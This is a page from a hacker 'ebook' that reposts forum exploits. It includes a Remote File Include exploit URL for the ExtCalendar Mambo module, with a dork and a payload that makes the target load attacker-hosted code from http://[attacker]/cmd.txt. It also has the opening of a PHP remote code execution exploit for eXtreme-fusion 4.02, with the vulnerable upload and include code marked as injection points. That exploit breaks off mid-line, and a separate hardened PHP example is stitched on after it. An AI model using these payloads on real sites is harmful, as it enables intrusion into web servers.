
Hacker Professional Ebook part 370 pptx


http://www.example.com/i-accueil.php?chemin=conc99
http://www.example.com/i-index.php?chemin=conc99

Black_hat_cr(HCE)

ExtCalendar Mambo Module <= v2 Remote File Include Vulnerabilities

Title : ExtCalendar Mambo Module <= v2 Remote File Include Vulnerabilities
###############################################################################
Discovered By OLiBekaS
dork : "powered by ExtCalendar v2"

Exploit :
http://[target]/[path]/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://[attacker]/cmd.txt?&cmd=ls

greatz:
~~~~~
# Special greetz to my master effex and bEdAh`oTaK ( thank man )
# To all members of #papmahackerlink, cgibin, weleh, skulmatic, sikunYuk, brokencode, ulga, SaMuR4i_X, bigmaster, yugo^cloudy. and other

Contact:
~~~~~~~
Nick: OLiBekaS
E-mail: olibekas[at]gmail[dot]Com
Homepage: http://bekas.6te.net

[ eof ]

baby_hacker(HCE)

Extreme-fusion <= 4.02 Remote Code Execution Exploit

PHP Code:
<?
//Kacper Settings
$exploit_name = "extreme-fusion <= 4.02 Remote Code Execution Exploit";
$script_name = "eXtreme-fusion 4.02";
$script_site = "http://extreme-fusion.pl/download-cat16";
$dork = '"by eXtreme Crew"';
//**************************************************************
print '
[ASCII-art banner]
- - [DEVIL TEAM THE BEST POLISH TEAM] - -
[Exploit name: '.$exploit_name.'
[Script name: '.$script_name.'
[Script site: '.$script_site.'
dork: '.$dork.'

Find by: Kacper (a.k.a Rahim)
========> DEVIL TEAM IRC: irc.milw0rm.com:6667 #devilteam <========
========> http://www.rahim.webd.pl/ <========
Contact: kacper1964@yahoo.pl
(c)od3d by Kacper
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Greetings DragonHeart and all DEVIL TEAM Patriots :)
- Leito & Leon | friend str0ke ;)
pepi, nukedclx, SkD, MXZ, sysios, mIvus, wacky, xoron, fdj, mass, D3m0n (ziom z Niemiec :P)
and
Dr Max Virus
TamTurk,
hackersecurity.org
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Greetings for 4ll Fusi0n Group members ;-)
and all members of hacker.com.pl ;)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
';
/*
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
in file infusions/fusion_forum_view/fusion_forum_view.php:
[line 1-5]
<?
if (file_exists(INFUSIONS."fusion_forum_view/locale/".$settings['locale'].".php")) { // < {2}
    include INFUSIONS."fusion_forum_view/locale/".$settings['locale'].".php"; // < {1}
} else {
    include INFUSIONS."fusion_forum_view/locale/English.php";
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
in file submit.php:
[line 342-373]
if (isset($_POST['submit_photo'])) {
    require_once INCLUDES."photo_functions_include.php";
    $error = "";
    $submit_info['photo_title'] = stripinput($_POST['photo_title']);
    $submit_info['photo_description'] = stripinput($_POST['photo_description']);
    $submit_info['album_id'] = isNum($_POST['album_id']) ? $_POST['album_id'] : "0";
    if (is_uploaded_file($_FILES['photo_pic_file']['tmp_name'])) {
        $photo_types = array(".gif",".jpg",".jpeg",".png");
        $photo_pic = $_FILES['photo_pic_file'];
        $photo_name = strtolower(substr($photo_pic['name'], 0, strrpos($photo_pic['name'], ".")));
        $photo_ext = strtolower(strrchr($photo_pic['name'],"."));
        $photo_dest = PHOTOS."submissions/";
        if (!preg_match("/^[-0-9A-Z_\[\]]+$/i", $photo_name)) {
            $error = 1;
        } elseif ($photo_pic['size'] > $settings['photo_max_b']){
            $error = 2;
        } elseif (!in_array($photo_ext, $photo_types)) {
            $error = 3;
        } else {
            $photo_file = image_exists($photo_dest, $photo_name.$photo_ext);
            move_uploaded_file($photo_pic['tmp_name'], $photo_dest.$photo_file); // < {3(step1)}
            chmod($photo_dest.$photo_file, 0644);
            $imagefile = @getimagesize($photo_dest.$photo_file);
            if (!verify_image($photo_dest.$photo_file)) {
                $error = 3;
                unlink($photo_dest.$photo_file);
            } elseif ($imagefile[0] > $settings['photo_max_w'] || $imagefile[1] > $settings['photo_max_h']) {
                $error = 4;
                unlink($photo_dest.$photo_file);
            } else {
                $submit_info['photo_file'] = $photo_file;
            }
        }
    }
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
in file submit.php:
[line 223-250]
if (isset($_POST['upload'])) {
    opentable($locale['552']);
    if ($_FILES['plik']['name']!="") {
        if(!file_exists("downloads/".$_FILES['plik']['name'])) {
            move_uploaded_file($_FILES['plik']['tmp_name'],"downloads/".$_FILES['plik']['name']); // < {3(step2)}
            switch($_FILES['plik']['error']) {
                case '0':
                    echo $locale['542'].round($_FILES['plik']['size'] / 1024).'KB';
                    $submit_info['download_title'] = stripinput($_POST['download_title']);
                    $submit_info['download_description'] = stripinput($_POST['download_description']);
                    $submit_info['download_url'] = "downloads/".$_FILES['plik'][
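Added example, not part of the original post and not eXtreme-fusion code: hardened counterparts of the two patterns the excerpt marks, the include path built from $settings['locale'] ({1}/{2}) and the download stored under the client-supplied file name ({3(step2)}). The function names, the locale list, the extension list and the paths are assumptions made for illustration; $destDir is assumed to be a directory where the web server does not execute scripts.

```php
<?php
// Added example (not eXtreme-fusion code): hardened counterparts of the
// patterns marked {1}/{2} and {3(step2)} above. Function names, the locale
// list and the extension list are assumptions made for illustration.

// {1}/{2}: choose the locale file from a fixed allowlist rather than
// concatenating a settings value into the include path.
function safe_locale_file(string $baseDir, string $requested): string
{
    $allowed = ['English', 'Polish'];            // assumed shipped locales
    $name = in_array($requested, $allowed, true) ? $requested : 'English';
    return rtrim($baseDir, '/') . '/' . $name . '.php';
}

// {3(step2)}: never store an upload under the client-supplied name.
// Returns the stored file name, or null if the upload is rejected.
function store_download(array $file, string $destDir): ?string
{
    $allowedExt = ['zip', 'pdf', 'txt'];         // assumed policy
    // Check the error code before touching the file (the excerpt moves first).
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return null;
    }
    if (!is_uploaded_file($file['tmp_name'])) {
        return null;
    }
    // Only the final extension is taken from the client name, and it must
    // be on the allowlist; the rest of the name is discarded.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!in_array($ext, $allowedExt, true)) {
        return null;
    }
    // Server-generated name: no path separators, no double extensions.
    $stored = bin2hex(random_bytes(16)) . '.' . $ext;
    $target = rtrim($destDir, '/') . '/' . $stored;
    if (!move_uploaded_file($file['tmp_name'], $target)) {
        return null;
    }
    chmod($target, 0640);
    return $stored;
}

// Constructed input: a locale value that is not on the allowlist.
var_dump(safe_locale_file('/srv/app/locale', 'NoSuchLocale'));
```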

Posted: 04/07/2014, 12:20
